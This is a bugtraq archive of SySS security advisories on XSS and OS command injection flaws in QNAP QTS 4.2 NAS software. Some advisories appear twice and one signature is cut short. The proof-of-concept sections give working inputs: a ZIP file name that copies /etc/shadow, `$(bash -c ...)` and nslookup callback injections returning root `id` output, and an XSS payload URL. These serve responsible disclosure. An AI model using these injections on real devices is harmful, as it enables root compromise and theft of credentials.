[SYSS-2016-049] QNAP QTS - Persistent Cross-Site Scripting

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-049
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.0 Build 20160311 and Build 20160601
Tested Version(s): 4.2.0 Build 20160311 - 4.2.2 Build 20160812
Vulnerability Type: Persistent Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: unfixed
Manufacturer Notification: 2016-06-03
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices (see [1]).



Vulnerability Details:

The SySS GmbH found a persistent/stored cross-site scripting
vulnerability in the file viewer component of the QTS administrative
interface.

This type of vulnerability allows an attacker to store active content
like JavaScript on the system, executing the code in the browser of
visitors viewing the affected page. The code can then be used to e.g.
execute commands in the scope of the user, infect the users browser and
so on.



Proof of Concept (PoC):

1. Log in to the QNAP. The user needs sufficient permissions to either
create or rename directories.
2. When creating a folder, the QTS web interface runs some checks on the
new name of the created folder. Those checks are only performed with
JavaScript in the browser. If folder-creation or renaming is performed
with a direct request to the QNAP, no string-validation is done.

$ curl --data
'dest_path=%2F[validDirectory]_folder==[validsid]'
http://[ip]:8080/cgi-bin/filemanager/utilRequest.cgi?func=createdir
3. Open the newly created directory in the file 'File Station'
component. The name of the directory will be displayed without prior
sanitation or encoding, thus executing the provided script.



Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only 
trusted users/administrators have the neccessary permissions to create 
or rename directories.



Disclosure Timeline:

2016-06-03: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-049

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-049.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.n...@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVkAAoJENEtJqSRgP2yU2IH/jfUaEPw5Dql7OvXyceQeYrZ
+XHLGfeOecVbxQi2SjKxRMYRxS1mYDF975Lqfc9/PaKUsgZMk1NRWEYDFyB29AQO
HQQ0s9boANfPaJUSxmF9+DE/CIkh1PI/Zw6s8ox+WtvvLnutWbfll6ERD9xB0MCu
wn9QqseR8Jveg4lF/dHRqzdmBZnCSFJp/INLLs4i5DQsvjSCo/hnWTclyU+gh1jD
xIsUb9xoxE4XgeFfOz8O5SPeULkNupCbn6NHRyjWs1fZXBR0et9ThwQw8fHhjIq8
S3dcX2MEcs/7j2G4tqOLq6e/HIoZ3Nt/1uL8dZ64bLoKS4dXKPwtBmDDV+629R4=
=oJRw
-END PGP SIGNATURE-

[SYSS-2016-054] QNAP QTS - OS Command Injection

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-054
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.1 Build 20160601
Tested Version(s): 4.2.1 Build 20160601 - 4.2.2 Build 20160812
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: unfixed
Manufacturer Notification: 2016-06-07
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices[1].



Vulnerability Details:


The SySS GmbH found an os command injection in the appRequest plugin of 
the current QTS administrative interface.

This type of vulnerability allows an attacker to run arbitrary commands
on the operating system of the host as root.



Proof of Concept (PoC):

1. Log in to the QNAP. The user needs no special privileges.
2. Run a request like the following:

==
POST /cgi-bin/application/appRequest.cgi?=getRemoteRSS HTTP/1.1
Host: 192.168.42.201:8080
Content-Length: 39

lang=geryyy><=qpkg=[validSid]

==
3. The lang-Parameter will be placed inside of a wget-command without
encoding or sanitizing the string. It will be shortened to only 8 
characters lengths, making exploiting difficult. Still e.g. overwriting
critical data would be easy.

The above requests displays an error message in the header, similar to 
the following:

HTTP/1.1 200 OK
Date: Tue, 07 Jun 2016 05:57:57 GMT
sh: -c: line 0: syntax error near unexpected token `<'
sh: -c: line 0: `/usr/bin/wget -t 1 -T 30 -q 
http://download.qnap.com/Liveupdate/QTS4.2.1/qpkgcenter_geryyy><hPÞÿ<}h£a 
   .xml -O /home/httpd/RSS/rssdoc/qpkgcenter_geryyy><hPÞÿ<}h£a  
.xml.tmp 1>>/dev/null 2>>/dev/null'
Content-type: text/xml
Content-Length: 4587




Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only 
trusted users/administrators have access to the device.



Disclosure Timeline:

2016-06-07: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-054

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-054.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/




Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.n...@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVoAAoJENEtJqSRgP2ydA0H/jHyaW0S//do0y13oEWH1n8O
QAwTKnWY5SiPOZ6CdEFh+W7VsuZsh5QupIHFm/mYRPZ3gfBmFc/Pk9f/qQFCoHmc
6whFVm/E8WbwasHUo4uLEiFwFOsCSG2j+45+DqF5YIWXQZm/Fk7q+AlSEqQo169+
kvXoZpGD81JAq0TwzpbKFExwip+zxlSdkjffwXoJcNijD1DXIRjx1j5qML9P5W/h
UJVCkAiAoICJf8Cei6jrIDN/LjvHHWtw2R7AFw0Eic3CQjkdWFqAHOEV6s7CNQjD
Rrr3za7BPN6CUe098BDbnXhmIFu4T2ZbJ+88jPMXHUv5NcvZ7SwSIE++uYQ0FmI=
=LzeJ
-END PGP SIGNATURE-

[SYSS-2016-049] QNAP QTS - Persistent Cross-Site Scripting

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-049
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.0 Build 20160311 and Build 20160601
Tested Version(s): 4.2.0 Build 20160311 - 4.2.2 Build 20160812
Vulnerability Type: Persistent Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: unfixed
Manufacturer Notification: 2016-06-03
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices (see [1]).



Vulnerability Details:

The SySS GmbH found a persistent/stored cross-site scripting
vulnerability in the file viewer component of the QTS administrative
interface.

This type of vulnerability allows an attacker to store active content
like JavaScript on the system, executing the code in the browser of
visitors viewing the affected page. The code can then be used to e.g.
execute commands in the scope of the user, infect the users browser and
so on.



Proof of Concept (PoC):

1. Log in to the QNAP. The user needs sufficient permissions to either
create or rename directories.
2. When creating a folder, the QTS web interface runs some checks on the
new name of the created folder. Those checks are only performed with
JavaScript in the browser. If folder-creation or renaming is performed
with a direct request to the QNAP, no string-validation is done.

$ curl --data
'dest_path=%2F[validDirectory]_folder==[validsid]'
http://[ip]:8080/cgi-bin/filemanager/utilRequest.cgi?func=createdir
3. Open the newly created directory in the file 'File Station'
component. The name of the directory will be displayed without prior
sanitation or encoding, thus executing the provided script.



Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only 
trusted users/administrators have the neccessary permissions to create 
or rename directories.



Disclosure Timeline:

2016-06-03: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-049

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-049.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.n...@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVkAAoJENEtJqSRgP2yU2IH/jfUaEPw5Dql7OvXyceQeYrZ
+XHLGfeOecVbxQi2SjKxRMYRxS1mYDF975Lqfc9/PaKUsgZMk1NRWEYDFyB29AQO
HQQ0s9boANfPaJUSxmF9+DE/CIkh1PI/Zw6s8ox+WtvvLnutWbfll6ERD9xB0MCu
wn9QqseR8Jveg4lF/dHRqzdmBZnCSFJp/INLLs4i5DQsvjSCo/hnWTclyU+gh1jD
xIsUb9xoxE4XgeFfOz8O5SPeULkNupCbn6NHRyjWs1fZXBR0et9ThwQw8fHhjIq8
S3dcX2MEcs/7j2G4tqOLq6e/HIoZ3Nt/1uL8dZ64bLoKS4dXKPwtBmDDV+629R4=
=oJRw
-END PGP SIGNATURE-

[SYSS-2016-050] QNAP QTS - Persistent Cross-Site Scripting

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-050
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.0 Build 20160311 and Build 20160601
Tested Version(s): 4.2.0 Build 20160311 - 4.2.2 Build 20160812
Vulnerability Type: Persistent Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: unfixed
Manufacturer Notification: 2016-06-03
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices (see [1]).



Vulnerability Details:

The SySS GmbH found a persistent/stored cross-site scripting
vulnerability in the file viewer component of the QTS administrative
interface.

This type of vulnerability allows an attacker to store active content
like JavaScript on the system, executing the code in the browser of
visitors viewing the affected page. The code can then be used to e.g.
execute commands in the scope of the user, infect the users browser and
so on.



Proof of Concept (PoC):


1. Log in to the QNAP. The user needs sufficient permissions to create
ZIP files.
2. Right-click on a file or directory and select "compress(ZIP)"
3. In the newly opened window, enter a name containing HTML codes like
blabla
and press OK
4. The code is being executed directly after creating the ZIP.
5. Right-click on the ZIP-file and hover over 'Extract".
Again, the code is being executed.



Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only 
trusted users/administrators have the neccessary permissions to create 
or rename directories.



Disclosure Timeline:

2016-06-03: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-06-22: Vulnerability report updated to fix error in "hover over" 
description.
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-050

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-050.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.n...@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVlAAoJENEtJqSRgP2yicQH/RVeQNcb3qhDUiLlfRMKmV//
Fxt52iVXKai0QiWN6GqBOIU0qon4xXvWyiwJckox5QMXJWELi4PPNoyPxfipCp0M
Q8jIbm1KbxMt2SAwUUG1fFY1Dvj8/dWt81S/HLWj131M7QParwFhLjiBoFNnerLM
49QSWe4jYonIUbqINqIIEJ1lp3hbHDTBOOlXHQahpxsUvphBsJBKfEJImERJ9vGT
VhJam8WJwwKjxsLRDxUiUiL2waLAhdbi2HeJiZy1CplwRvDst2yA5zdDG5iz5O3G
zcByMMyk5ZfRATGPYTH6tuEx2SWtFVFIIXPL8FtWi/7vKn2pITcj9vADFvANxSM=
=xxMF
-END PGP SIGNATURE-

[SYSS-2016-055] QNAP QTS - OS Command Injection

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-055
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.1 Build 20160601
Tested Version(s): 4.2.1 Build 20160601 - 4.2.2 Build 20160812
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: Unfixed
Manufacturer Notification: 2016-06-08
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices (see [1]).



Vulnerability Details:

The SySS GmbH found an OS command injection in the appRequest plugin of 
the current QTS administrative interface.

This type of vulnerability allows an attacker to run arbitrary commands
on the operating system of the host as root.



Proof of Concept (PoC):

1. Log in to the QNAP. The user needs the privileges to create backup
   jobs.

2. Run a request like the following, testing connection to another QNAP
   for backups:

==
POST /cgi-bin/wizReq.cgi? HTTP/1.1 
Host: [IP of the QNAP]:8080
Content-Length: 282 
 
wiz_func=backup=test_server=1465380979663_CLIENT_MODE=QNAP_mode_LOCATION=$(bash%20-c%20"(echo;pwd)1>%262";exit)_CLIENT_PORT=873_VOL=undefined_PATH=%2F_USERNAME=$(bash%20-c%20"(echo;id)1>%262";exit)_PASSWD=asd_vol_info=yes=[sid]

3. The contained commands in SMB_LOCATION and SMB_USERNAME will be
   executed, as demonstrated in the following server response containing
   the output of the id and pwd commands:

==
HTTP/1.1 200 OK 
Date: Wed, 08 Jun 2016 10:31:50 GMT 
Content-Type: text/plain 
Content-Length: 1205 
 
uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)

/home/httpd/cgi-bin
Content-type: text/xml 
 


[...]



Solution:

The manufacturer has not released any security update or patch so far.
Validate input-strings, escape shell arguments or use parametrized
command executions.



Disclosure Timeline:

2016-06-08: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-055

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-055.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Sebastian Nerz of the SySS
GmbH.

E-Mail: sebastian.n...@syss.de
Public Key: 
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVpAAoJENEtJqSRgP2ywaYH/iCazUSz3EwUPxCTYQ2Qp8ce
egdvqcBUGXnqsUaUWy181K8R1Ive0h2F8IzTCft5gPX8y9FT+Pa35e1po/fBIFJg
EmV0w8D79+BAvUK23POFFyRXubrvtBQ9hOgq45qPYvGUkHEMGdzDRB9fuACwoJwS
xVxxWjtz7EgPPhhGzuh9RKu4slgJzsFustUNci/6FDPDc1+samcPxp3a/xo9ol2h
WEuaN80USZEdQgmTpf/2ePpVWmv72mtNrtWXLNbuUEtnYxALmO15S9BGQ7RpN+cB
hzM9CB87c7AIqd6owslaGcP4ZmjyKRSp1zgZnVycZPxsuVWrKmGetnewf1eOE0g=
=0eHe
-END PGP SIGNATURE-

[SYSS-2016-048] QNAP QTS - OS Command Injection

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-048
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.0 Build 20160311 and Build 20160601
Tested Version(s): 4.2.0 Build 20160311 - 4.2.2 Build 20160812
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: unfixed
Manufacturer Notification: 2016-06-03
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices (see [1]).



Vulnerability Details:


The SySS GmbH found an os command injection in the file station of the
current QTS administrative interface.

This type of vulnerability allows an attacker to run arbitrary commands
on the operating system of the host as root.



Proof of Concept (PoC, Build 20160311)

1. Log in to the QNAP. The user needs sufficient permissions to either
rename or create ZIP files.
2. Upload or create a ZIP file with the following name:

a;echo -e "cp \x2fetc\x2fshadow \x2fshare\x2fCACHEDEV1_DATA\x2f[current
dir]" | bash ; echo .zip

3. Right-click on the ZIP file and select Extract > Extract to 
[pre-selected directory with the name of the ZIP file]
(Extract > last entry)

4. The contained code will be exected, in this case: /etc/shadow copied
to the current directory. Other code can of course be run as well,
e.g. to display some strings on the front-display of the QNAP (tested
with a 470 Pro) name the ZIP file like this and extract it:

a;lcd_tool -1 PoC -2 OS-Command-Injection; echo .zip

Depending on the system this might not work out of the box.




Proof of Concept (PoC, Build 20160601)

1. Log in to the QNAP. The user needs sufficient permissions to either
rename or create ZIP files.
2. Upload or create a ZIP file with the following name:

test$(nslookup examplehost).zip

3. Right-click on the ZIP file and select Extract > Extract files

4. The contained code will be executed as can be confirmed by listening 
on the corresponding network.

The original exploit (Extract > last entry) will not work on the current
release of QTS. This exploit should work on previous versions of QTS as
well.




Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only 
trusted users/administrators have access to the device.



Disclosure Timeline:

2016-06-03: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-06-22: Report updated to adress (minor) changes in build 20160601
2016-07-06: Updated report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-048

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-048.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/




Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.nerz-at-syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWViAAoJENEtJqSRgP2yhjUIALi90iAlcbMaJuDlxw5myP22
ULuhqRRCsqS6kR5gVrUA7eJSRHYDubXF1PlW9SoYt3bdTfRyhb1Pwf71yGggmZ+M
eCS6ImGIwKvEoJNkXsWLSV9p2hd/ha/GgTPwEa0wwUJYvuBJfadthH71WlKi7e5u
68RYX3L/IO2wylkTa6L0MJU4le48EpZOZxgcuJIXTo5qt/nDDApKS3h1W3EqNAo7

[SYSS-2016-051] QNAP QTS - Reflected Cross-Site Scripting

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

dvisory ID: SYSS-2016-051
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.1 Build 20160601
Tested Version(s): 4.2.1 Build 20160601 - 4.2.2 Build 20160812
Vulnerability Type: Reflected Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: unfixed
Manufacturer Notification: 2016-06-06
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices.



Vulnerability Details:

The SySS GmbH found a reflected cross-site scripting vulnerability in 
the /cgi-bin/application/appRequest.cgi component of the QTS administrative 
interface.

This type of vulnerability allows an attacker to create an URL which, when
opened in the victims browser, leads to the display of active element like
inserted JavaScript code in the victims browser, leading to the exeuction
of this code. The code can then be used to e.g. execute commands in the 
scope of the user, infect the users browser and so on.



Proof of Concept (PoC):

1. Open the following URL in a browser without sufficient rXSS protection
(e.g. Firefox):
http://[QNAPIP]:8080/cgi-bin/application/appRequest.cgi?action=getQPKGDownloads=Testlink%3Cimg%20src=foo%20onError=alert%281%29%3E




Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should restrict access to a
QNAP device to trusted users. Users should be informed about the 
vulnerability and tutored about security awareness.



Disclosure Timeline:

2016-06-06: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-051

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-051.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.n...@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVmAAoJENEtJqSRgP2yoOYIAIAt8/wPa0J2QHCUQpDsO3VH
uekOzXqZhB17FhXKe/N+X3TEFBwO1BE8ohQdprabgd0q+e0Cxiod9Asz+WTE4yZ0
lRNAMfAeMciX9F7UaMj9InNUFkv1sVo4cWGyHRb9DoI+snOEO/DO8Ssx9MbfJMRq
cNSSO9LAz5asuehiJ6YDYhK7EkcLpj0xg38Kku31NwYWCU6jiAvgJc+NkUjtNSRm
ROAtMvx3wuW7XigkVR+mwtMAgLIj+fVOxypcPoyjupTNMUsRgMgHOQVs3j139GQK
LBnyilmAO4S6EDj27FOXEW5PKC0k72uBFDs8U70PCETeI3e92d9gXeBOt6TIlmw=
=9tl1
-END PGP SIGNATURE-

[SYSS-2016-054] QNAP QTS - OS Command Injection

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-054
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.1 Build 20160601
Tested Version(s): 4.2.1 Build 20160601 - 4.2.2 Build 20160812
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: unfixed
Manufacturer Notification: 2016-06-07
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices[1].



Vulnerability Details:


The SySS GmbH found an os command injection in the appRequest plugin of 
the current QTS administrative interface.

This type of vulnerability allows an attacker to run arbitrary commands
on the operating system of the host as root.



Proof of Concept (PoC):

1. Log in to the QNAP. The user needs no special privileges.
2. Run a request like the following:

==
POST /cgi-bin/application/appRequest.cgi?=getRemoteRSS HTTP/1.1
Host: 192.168.42.201:8080
Content-Length: 39

lang=geryyy><=qpkg=[validSid]

==
3. The lang-Parameter will be placed inside of a wget-command without
encoding or sanitizing the string. It will be shortened to only 8 
characters lengths, making exploiting difficult. Still e.g. overwriting
critical data would be easy.

The above requests displays an error message in the header, similar to 
the following:

HTTP/1.1 200 OK
Date: Tue, 07 Jun 2016 05:57:57 GMT
sh: -c: line 0: syntax error near unexpected token `<'
sh: -c: line 0: `/usr/bin/wget -t 1 -T 30 -q 
http://download.qnap.com/Liveupdate/QTS4.2.1/qpkgcenter_geryyy><hPÞÿ<}h£a 
   .xml -O /home/httpd/RSS/rssdoc/qpkgcenter_geryyy><hPÞÿ<}h£a  
.xml.tmp 1>>/dev/null 2>>/dev/null'
Content-type: text/xml
Content-Length: 4587




Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only 
trusted users/administrators have access to the device.



Disclosure Timeline:

2016-06-07: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-054

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-054.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/




Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.n...@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVoAAoJENEtJqSRgP2ydA0H/jHyaW0S//do0y13oEWH1n8O
QAwTKnWY5SiPOZ6CdEFh+W7VsuZsh5QupIHFm/mYRPZ3gfBmFc/Pk9f/qQFCoHmc
6whFVm/E8WbwasHUo4uLEiFwFOsCSG2j+45+DqF5YIWXQZm/Fk7q+AlSEqQo169+
kvXoZpGD81JAq0TwzpbKFExwip+zxlSdkjffwXoJcNijD1DXIRjx1j5qML9P5W/h
